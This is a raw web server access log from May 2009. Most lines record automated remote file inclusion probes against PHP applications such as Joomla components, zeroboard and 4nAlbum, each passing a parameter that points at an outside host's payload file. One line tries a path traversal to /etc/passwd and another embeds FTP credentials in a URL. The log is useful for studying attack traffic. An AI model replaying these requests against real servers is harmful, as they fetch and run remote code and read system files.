122.116.178.20 - - [08/May/2009:02:07:33 -0400] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
122.116.178.20 - - [08/May/2009:02:07:33 -0400] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
122.116.178.20 - - [08/May/2009:02:07:33 -0400] "GET /logs/access_log.Q109032100//modules/4nAlbum/public/displayCategory.php?basepath=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
115.145.170.177 - - [08/May/2009:02:07:34 -0400] "GET /logs/access_log.Q109042600//?_zb_path=http://ssdnb.net/bbs/vo.txt?? HTTP/1.1" 404 226 "-" "libwww-perl/5.805"
115.145.170.177 - - [08/May/2009:02:07:35 -0400] "GET //?_zb_path=http://ssdnb.net/bbs/vo.txt?? HTTP/1.1" 200 452 "-" "libwww-perl/5.805"
115.145.170.177 - - [08/May/2009:02:07:35 -0400] "GET /logs//?_zb_path=http://ssdnb.net/bbs/vo.txt?? HTTP/1.1" 200 485 "-" "libwww-perl/5.805"
116.121.201.70 - - [08/May/2009:02:07:36 -0400] "GET /logs/access_log.Q109021900//?_zb_path=http://ssdnb.net/bbs/vo.txt?? HTTP/1.1" 404 226 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
122.116.178.20 - - [08/May/2009:02:07:57 -0400] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
122.116.178.20 - - [08/May/2009:02:07:57 -0400] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
122.116.178.20 - - [08/May/2009:02:07:57 -0400] "GET /logs/access_log.Q109032100//modules/4nAlbum/public/displayCategory.php?basepath=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
88.84.128.40 - - [08/May/2009:02:07:58 -0400] "GET /logs/access_log.Q109012400/modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 280 "-" "libwww-perl/5.803"
88.84.128.40 - - [08/May/2009:02:07:59 -0400] "GET /modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 253 "-" "libwww-perl/5.803"
88.84.128.40 - - [08/May/2009:02:07:59 -0400] "GET /logs/modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 258 "-" "libwww-perl/5.803"
69.94.30.156 - - [08/May/2009:02:08:09 -0400] "GET /logs/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.hitler.h17.ru//gallery/1.gif?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
69.94.30.156 - - [08/May/2009:02:08:09 -0400] "GET /logs/access_log.Q108111600/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.hitler.h17.ru//gallery/1.gif?? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
69.94.30.156 - - [08/May/2009:02:08:09 -0400] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.hitler.h17.ru//gallery/1.gif?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
116.121.201.70 - - [08/May/2009:02:08:31 -0400] "GET /logs/access_log.Q109031800//?_zb_path=http://ssdnb.net/bbs/vo.txt? HTTP/1.1" 404 226 "-" "libwww-perl/5.65"
116.121.201.70 - - [08/May/2009:02:08:31 -0400] "GET //?_zb_path=http://ssdnb.net/bbs/vo.txt? HTTP/1.1" 200 452 "-" "libwww-perl/5.65"
116.121.201.70 - - [08/May/2009:02:08:32 -0400] "GET /logs//?_zb_path=http://ssdnb.net/bbs/vo.txt? HTTP/1.1" 200 485 "-" "libwww-perl/5.65"
122.70.59.13 - - [08/May/2009:02:08:40 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)"
122.70.59.13 - - [08/May/2009:02:08:40 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)"
122.70.59.13 - - [08/May/2009:02:08:48 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)"
122.70.59.13 - - [08/May/2009:02:08:48 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)"
116.121.201.70 - - [08/May/2009:02:08:51 -0400] "GET /logs/access_log.Q109021900//?_zb_path=http://ssdnb.net/bbs/vo.txt?? HTTP/1.1" 404 226 "-" "libwww-perl/5.65"
88.84.128.40 - - [08/May/2009:02:09:04 -0400] "GET /logs/access_log.Q108122400/modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 280 "-" "libwww-perl/5.803"
116.121.201.70 - - [08/May/2009:02:09:25 -0400] "GET //?_zb_path=http://ssdnb.net/bbs/vo.txt?? HTTP/1.1" 200 452 "-" "libwww-perl/5.65"
115.145.170.177 - - [08/May/2009:02:09:49 -0400] "GET /logs/access_log.Q109021900//?_zb_path=http://ssdnb.net/bbs/vo.txt?? HTTP/1.1" 404 226 "-" "libwww-perl/5.805"
209.59.12.99 - - [08/May/2009:02:09:57 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.197.202.64 - - [08/May/2009:02:10:10 -0400] "GET /logs/access_log.Q108082300//modules/4nAlbum/public/displayCategory.php?basepath=http://fst.upsi.edu.my/mambots/editors/id.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
66.197.202.64 - - [08/May/2009:02:10:10 -0400] "GET /logs/access_log.Q108083100//modules/4nAlbum/public/displayCategory.php?basepath=http://fst.upsi.edu.my/mambots/editors/id.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
69.94.30.156 - - [08/May/2009:02:10:14 -0400] "GET /logs/access_log.Q108111600%20%20/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.hitler.h17.ru//gallery/1.gif?? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
122.116.178.20 - - [08/May/2009:02:10:37 -0400] "GET /logs/access_log.Q109032100%20%20//modules/4nAlbum/public/displayCategory.php?basepath=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
69.94.30.156 - - [08/May/2009:02:10:46 -0400] "GET /logs/access_log.Q108060700%20%20/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.hitler.h17.ru//gallery/1.gif?? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
210.239.42.208 - - [08/May/2009:02:11:00 -0400] "GET /errors.php?error=http://sk8sunabe.heteml.jp/mt/mt-static//numpang/ngene.txt? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
122.116.178.20 - - [08/May/2009:02:11:09 -0400] "GET /logs/access_log.Q109032100%20%20//modules/4nAlbum/public/displayCategory.php?basepath=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
116.121.201.70 - - [08/May/2009:02:11:51 -0400] "GET /logs/access_log.Q109042600//?_zb_path=http://ssdnb.net/bbs/vo.txt? HTTP/1.1" 404 226 "-" "libwww-perl/5.65"
116.121.201.70 - - [08/May/2009:02:11:53 -0400] "GET //?_zb_path=http://ssdnb.net/bbs/vo.txt? HTTP/1.1" 200 452 "-" "libwww-perl/5.65"
116.121.201.70 - - [08/May/2009:02:11:53 -0400] "GET /logs/access_log.Q109021900//?_zb_path=http://ssdnb.net/bbs/vo.txt? HTTP/1.1" 404 226 "-" "libwww-perl/5.65"
121.254.231.239 - - [08/May/2009:02:11:53 -0400] "GET /show_news.php?cutepath=http://masterpule.100webspace.net/id1.txt?? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
121.254.231.239 - - [08/May/2009:02:11:53 -0400] "GET /logs/show_news.php?cutepath=http://masterpule.100webspace.net/id1.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
121.254.231.239 - - [08/May/2009:02:11:53 -0400] "GET /logs/access_log.Q108081400%20%20/show_news.php?cutepath=http://masterpule.100webspace.net/id1.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
116.121.201.70 - - [08/May/2009:02:11:54 -0400] "GET /logs//?_zb_path=http://ssdnb.net/bbs/vo.txt? HTTP/1.1" 200 485 "-" "libwww-perl/5.65"
66.197.202.64 - - [08/May/2009:02:12:01 -0400] "GET //modules/mod_mainmenu.php?mosConfig_absolute_path=http://fst.upsi.edu.my/mambots/editors/id.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
66.197.202.64 - - [08/May/2009:02:12:01 -0400] "GET /logs//modules/mod_mainmenu.php?mosConfig_absolute_path=http://fst.upsi.edu.my/mambots/editors/id.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
66.197.202.64 - - [08/May/2009:02:12:01 -0400] "GET /logs/access_log.Q109042200%20%20//modules/mod_mainmenu.php?mosConfig_absolute_path=http://fst.upsi.edu.my/mambots/editors/id.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
121.254.231.239 - - [08/May/2009:02:12:36 -0400] "GET /logs/access_log.Q108100700/index.php?pag=http://masterpule.100webspace.net/id1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
121.254.231.239 - - [08/May/2009:02:12:36 -0400] "GET /index.php?pag=http://masterpule.100webspace.net/id1.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
121.254.231.239 - - [08/May/2009:02:12:36 -0400] "GET /logs/index.php?pag=http://masterpule.100webspace.net/id1.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
62.116.168.108 - - [08/May/2009:02:12:39 -0400] "GET //modules/mod_mainmenu.php?mosConfig_absolute_path=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
62.116.168.108 - - [08/May/2009:02:12:39 -0400] "GET /logs//modules/mod_mainmenu.php?mosConfig_absolute_path=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
62.116.168.108 - - [08/May/2009:02:12:50 -0400] "GET /logs/access_log.Q109042200%20%20//modules/mod_mainmenu.php?mosConfig_absolute_path=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
121.254.231.239 - - [08/May/2009:02:13:05 -0400] "GET /logs/access_log.Q108100700%20%20/index.php?pag=http://masterpule.100webspace.net/id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
66.197.202.64 - - [08/May/2009:02:13:26 -0400] "GET /logs/access_log.Q109042200//modules/mod_mainmenu.php?mosConfig_absolute_path=http://fst.upsi.edu.my/mambots/editors/id.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
210.68.188.206 - - [08/May/2009:02:13:31 -0400] "GET //inc/cmses/aedatingCMS.php?dir[inc]=http://xlab.cn.nctu.edu.tw//modules/xoopsgallery/id2x.txt??%0D?? HTTP/1.1" 404 224 "-" "libwww-perl/5.805"
210.68.188.206 - - [08/May/2009:02:13:32 -0400] "GET /logs/access_log.Q108100500//inc/cmses/aedatingCMS.php?dir[inc]=http://xlab.cn.nctu.edu.tw//modules/xoopsgallery/id2x.txt??%0D?? HTTP/1.1" 404 251 "-" "libwww-perl/5.805"
210.68.188.206 - - [08/May/2009:02:13:32 -0400] "GET /logs//inc/cmses/aedatingCMS.php?dir[inc]=http://xlab.cn.nctu.edu.tw//modules/xoopsgallery/id2x.txt??%0D?? HTTP/1.1" 404 229 "-" "libwww-perl/5.805"
222.239.76.25 - - [08/May/2009:02:13:32 -0400] "GET /logs/access_log.Q108111500//inc/cmses/aedatingCMS.php?dir[inc]=http://xlab.cn.nctu.edu.tw//modules/xoopsgallery/id1.txt??%0D? HTTP/1.1" 404 251 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
222.239.76.25 - - [08/May/2009:02:13:32 -0400] "GET //inc/cmses/aedatingCMS.php?dir[inc]=http://xlab.cn.nctu.edu.tw//modules/xoopsgallery/id1.txt??%0D? HTTP/1.1" 404 224 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
222.239.76.25 - - [08/May/2009:02:13:32 -0400] "GET /logs//inc/cmses/aedatingCMS.php?dir[inc]=http://xlab.cn.nctu.edu.tw//modules/xoopsgallery/id1.txt??%0D? HTTP/1.1" 404 229 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
222.239.76.25 - - [08/May/2009:02:13:34 -0400] "GET /logs/access_log.Q108111500/chat/inc/cmses/aedatingCMS.php?dir[inc]=http://xlab.cn.nctu.edu.tw//modules/xoopsgallery/id1.txt??%0D? HTTP/1.1" 404 255 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
222.239.76.25 - - [08/May/2009:02:13:34 -0400] "GET /logs/chat/inc/cmses/aedatingCMS.php?dir[inc]=http://xlab.cn.nctu.edu.tw//modules/xoopsgallery/id1.txt??%0D? HTTP/1.1" 404 233 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
222.239.76.25 - - [08/May/2009:02:13:34 -0400] "GET /chat/inc/cmses/aedatingCMS.php?dir[inc]=http://xlab.cn.nctu.edu.tw//modules/xoopsgallery/id1.txt??%0D? HTTP/1.1" 404 228 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
86.54.102.45 - - [08/May/2009:02:13:48 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
86.54.102.45 - - [08/May/2009:02:13:48 -0400] "GET /logs/access_log.Q108100100%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
86.54.102.45 - - [08/May/2009:02:13:48 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
86.54.102.45 - - [08/May/2009:02:13:54 -0400] "GET /logs/access_log.Q109021500%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
62.116.168.108 - - [08/May/2009:02:13:54 -0400] "GET /logs/access_log.Q109042200//modules/mod_mainmenu.php?mosConfig_absolute_path=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
93.187.232.189 - - [08/May/2009:02:14:12 -0400] "GET /logs/access_log.Q108082700//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.ambient-arts.co.uk/us/id.txt??? HTTP/1.1" 404 277 "-" "libwww-perl/5.808"
93.187.232.189 - - [08/May/2009:02:14:12 -0400] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.ambient-arts.co.uk/us/id.txt??? HTTP/1.1" 404 250 "-" "libwww-perl/5.808"
93.187.232.189 - - [08/May/2009:02:14:12 -0400] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.ambient-arts.co.uk/us/id.txt??? HTTP/1.1" 404 255 "-" "libwww-perl/5.808"
195.20.225.45 - - [08/May/2009:02:14:13 -0400] "GET /logs/access_log.Q108100400//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.stockphotosharing.com/Themes/Images/users_raw/id.txt?? HTTP/1.1" 404 243 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
195.20.225.45 - - [08/May/2009:02:14:13 -0400] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.stockphotosharing.com/Themes/Images/users_raw/id.txt?? HTTP/1.1" 404 216 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
222.239.76.25 - - [08/May/2009:02:14:16 -0400] "GET /logs/access_log.Q108100500/chat/inc/cmses/aedatingCMS.php?dir[inc]=http://xlab.cn.nctu.edu.tw//modules/xoopsgallery/id1.txt??%0D? HTTP/1.1" 404 255 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
93.187.232.189 - - [08/May/2009:02:14:17 -0400] "GET /logs/access_log.Q108082700//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.ambient-arts.co.uk/us/id.txt??? HTTP/1.1" 404 277 "-" "libwww-perl/5.808"
93.187.232.189 - - [08/May/2009:02:14:17 -0400] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.ambient-arts.co.uk/us/id.txt??? HTTP/1.1" 404 250 "-" "libwww-perl/5.808"
93.187.232.189 - - [08/May/2009:02:14:17 -0400] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.ambient-arts.co.uk/us/id.txt??? HTTP/1.1" 404 255 "-" "libwww-perl/5.808"
210.68.188.206 - - [08/May/2009:02:14:28 -0400] "GET /logs/access_log.Q108100500/chat/inc/cmses/aedatingCMS.php?dir[inc]=http://xlab.cn.nctu.edu.tw//modules/xoopsgallery/id2x.txt??%0D?? HTTP/1.1" 404 255 "-" "libwww-perl/5.805"
210.68.188.206 - - [08/May/2009:02:14:28 -0400] "GET /logs/chat/inc/cmses/aedatingCMS.php?dir[inc]=http://xlab.cn.nctu.edu.tw//modules/xoopsgallery/id2x.txt??%0D?? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
210.68.188.206 - - [08/May/2009:02:14:32 -0400] "GET /chat/inc/cmses/aedatingCMS.php?dir[inc]=http://xlab.cn.nctu.edu.tw//modules/xoopsgallery/id2x.txt??%0D?? HTTP/1.1" 404 228 "-" "libwww-perl/5.805"
222.239.76.25 - - [08/May/2009:02:14:33 -0400] "GET /logs/access_log.Q108100500//inc/cmses/aedatingCMS.php?dir[inc]=http://xlab.cn.nctu.edu.tw//modules/xoopsgallery/id1.txt??%0D? HTTP/1.1" 404 251 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
66.249.72.114 - - [08/May/2009:02:14:33 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):07+RNSUBS(S0040):01 HTTP/1.1" 200 54803 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
62.116.168.108 - - [08/May/2009:02:14:46 -0400] "GET /logs/access_log.Q108082300//modules/4nAlbum/public/displayCategory.php?basepath=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
62.116.168.108 - - [08/May/2009:02:14:51 -0400] "GET /logs/access_log.Q108083100//modules/4nAlbum/public/displayCategory.php?basepath=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
209.59.12.99 - - [08/May/2009:02:14:56 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
211.115.213.66 - - [08/May/2009:02:15:03 -0400] "GET /logs/access_log.Q108072300%20/config.php?path_to_root=ftp://delices:dfrt56@80.179.48.2/httpsdocs/v6id.txt??%0D?? HTTP/1.1" 404 236 "-" "libwww-perl/5.79"
195.20.225.45 - - [08/May/2009:02:15:03 -0400] "GET /logs/access_log.Q108102500//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.stockphotosharing.com/Themes/Images/users_raw/id.txt?? HTTP/1.1" 404 243 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
75.125.245.26 - - [08/May/2009:02:15:07 -0400] "GET /logs/access_log.Q108100700//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.politicalroundtable.com/plugins/pl.gif??? HTTP/1.1" 404 290 "-" "libwww-perl/5.805"
75.125.245.26 - - [08/May/2009:02:15:07 -0400] "GET //technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.politicalroundtable.com/plugins/pl.gif??? HTTP/1.1" 404 263 "-" "libwww-perl/5.805"
75.125.245.26 - - [08/May/2009:02:15:07 -0400] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.politicalroundtable.com/plugins/pl.gif??? HTTP/1.1" 404 268 "-" "libwww-perl/5.805"
75.125.245.26 - - [08/May/2009:02:15:07 -0400] "GET /logs/access_log.Q108112400//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.politicalroundtable.com/plugins/pl.gif??? HTTP/1.1" 404 290 "-" "libwww-perl/5.805"
122.116.178.20 - - [08/May/2009:02:15:28 -0400] "GET //modules/mod_mainmenu.php?mosConfig_absolute_path=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
122.116.178.20 - - [08/May/2009:02:15:28 -0400] "GET /logs//modules/mod_mainmenu.php?mosConfig_absolute_path=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
122.116.178.20 - - [08/May/2009:02:15:28 -0400] "GET /logs/access_log.Q109042200%20%20//modules/mod_mainmenu.php?mosConfig_absolute_path=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
210.68.188.206 - - [08/May/2009:02:15:32 -0400] "GET /logs/access_log.Q108111500//inc/cmses/aedatingCMS.php?dir[inc]=http://xlab.cn.nctu.edu.tw//modules/xoopsgallery/id2x.txt??%0D?? HTTP/1.1" 404 251 "-" "libwww-perl/5.805"
122.116.178.20 - - [08/May/2009:02:15:32 -0400] "GET //modules/mod_mainmenu.php?mosConfig_absolute_path=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
122.116.178.20 - - [08/May/2009:02:15:32 -0400] "GET /logs//modules/mod_mainmenu.php?mosConfig_absolute_path=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
122.116.178.20 - - [08/May/2009:02:15:33 -0400] "GET /logs/access_log.Q109042200%20%20//modules/mod_mainmenu.php?mosConfig_absolute_path=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
93.187.232.189 - - [08/May/2009:02:15:41 -0400] "GET /logs/access_log.Q108083100//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.ambient-arts.co.uk/us/id.txt??? HTTP/1.1" 404 277 "-" "libwww-perl/5.808"
93.187.232.189 - - [08/May/2009:02:15:45 -0400] "GET /logs/access_log.Q108083100//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.ambient-arts.co.uk/us/id.txt??? HTTP/1.1" 404 277 "-" "libwww-perl/5.808"
219.94.148.39 - - [08/May/2009:02:15:49 -0400] "GET /logs/access_log.Q108100400%20%20///?_zb_path=http://sk8sunabe.heteml.jp/mt/mt-static//numpang/fx29id2.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
195.20.225.45 - - [08/May/2009:02:15:50 -0400] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.stockphotosharing.com/Themes/Images/users_raw/id.txt?? HTTP/1.1" 404 216 "-" "libwww-perl/5.805"
219.94.148.39 - - [08/May/2009:02:15:53 -0400] "GET /logs/access_log.Q108110800%20%20///?_zb_path=http://sk8sunabe.heteml.jp/mt/mt-static//numpang/fx29id2.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
61.19.241.61 - - [08/May/2009:02:16:07 -0400] "GET /logs/access_log.Q108072300%20/config.php?path_to_root=ftp://delices:dfrt56@80.179.48.2/httpsdocs/v6id.txt??%0D?? HTTP/1.1" 404 236 "-" "libwww-perl/5.811"
211.115.213.66 - - [08/May/2009:02:16:32 -0400] "GET /logs/error_log.Q108080800/config.php?path_to_root=ftp://delices:dfrt56@80.179.48.2/httpsdocs/v6id.txt??%0D?? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
90.156.153.184 - - [08/May/2009:02:16:34 -0400] "GET /logs/access_log.Q108100400%20%20///?_zb_path=http://sk8sunabe.heteml.jp/mt/mt-static//numpang/fx29id2.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
74.6.8.112 - - [08/May/2009:02:16:57 -0400] "GET /logs/error_log.Q108070900 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
121.254.231.239 - - [08/May/2009:02:17:13 -0400] "GET /logs/access_log.Q108102500%20%20/index.php?pag=http://masterpule.100webspace.net/id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
194.246.101.99 - - [08/May/2009:02:17:16 -0400] "GET /logs///components/errors.php?error=../../../../../../../../etc/passwd HTTP/1.0" 404 226 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008070400 SUSE/3.0.1-0.1 Firefox/3.0.1"
194.246.101.99 - - [08/May/2009:02:17:16 -0400] "GET /logs//components/errors.php?error=http://www.rabika.ru/hk? HTTP/1.0" 404 225 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008070400 SUSE/3.0.1-0.1 Firefox/3.0.1"
195.20.225.45 - - [08/May/2009:02:17:22 -0400] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.stockphotosharing.com/Themes/Images/users_raw/id.txt?? HTTP/1.1" 404 216 "-" "libwww-perl/5.805"
210.68.188.206 - - [08/May/2009:02:17:25 -0400] "GET /logs/access_log.Q108111500/chat/inc/cmses/aedatingCMS.php?dir[inc]=http://xlab.cn.nctu.edu.tw//modules/xoopsgallery/id2x.txt??%0D?? HTTP/1.1" 404 255 "-" "libwww-perl/5.805"
66.249.72.114 - - [08/May/2009:02:17:44 -0400] "GET /logs/error_log.Q108051700 HTTP/1.1" 404 223 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
75.125.245.26 - - [08/May/2009:02:17:47 -0400] "GET /logs/access_log.Q108100700%20//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.politicalroundtable.com/plugins/pl.gif??? HTTP/1.1" 404 291 "-" "libwww-perl/5.805"
90.156.153.184 - - [08/May/2009:02:17:48 -0400] "GET /logs/access_log.Q108110800%20%20///?_zb_path=http://sk8sunabe.heteml.jp/mt/mt-static//numpang/fx29id2.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
122.116.178.20 - - [08/May/2009:02:18:07 -0400] "GET /logs/access_log.Q109042200//modules/mod_mainmenu.php?mosConfig_absolute_path=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
122.116.178.20 - - [08/May/2009:02:18:12 -0400] "GET /logs/access_log.Q109042200//modules/mod_mainmenu.php?mosConfig_absolute_path=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
91.195.124.10 - - [08/May/2009:02:18:19 -0400] "GET /logs//index.php?DOCUMENT_ROOT=http://indoirc.go.ro/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
91.195.124.10 - - [08/May/2009:02:18:19 -0400] "GET /logs/access_log.Q108082200//index.php?DOCUMENT_ROOT=http://indoirc.go.ro/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
91.195.124.10 - - [08/May/2009:02:18:19 -0400] "GET //index.php?DOCUMENT_ROOT=http://indoirc.go.ro/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
91.195.124.10 - - [08/May/2009:02:18:28 -0400] "GET /logs/access_log.Q108072300//index.php?DOCUMENT_ROOT=http://indoirc.go.ro/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
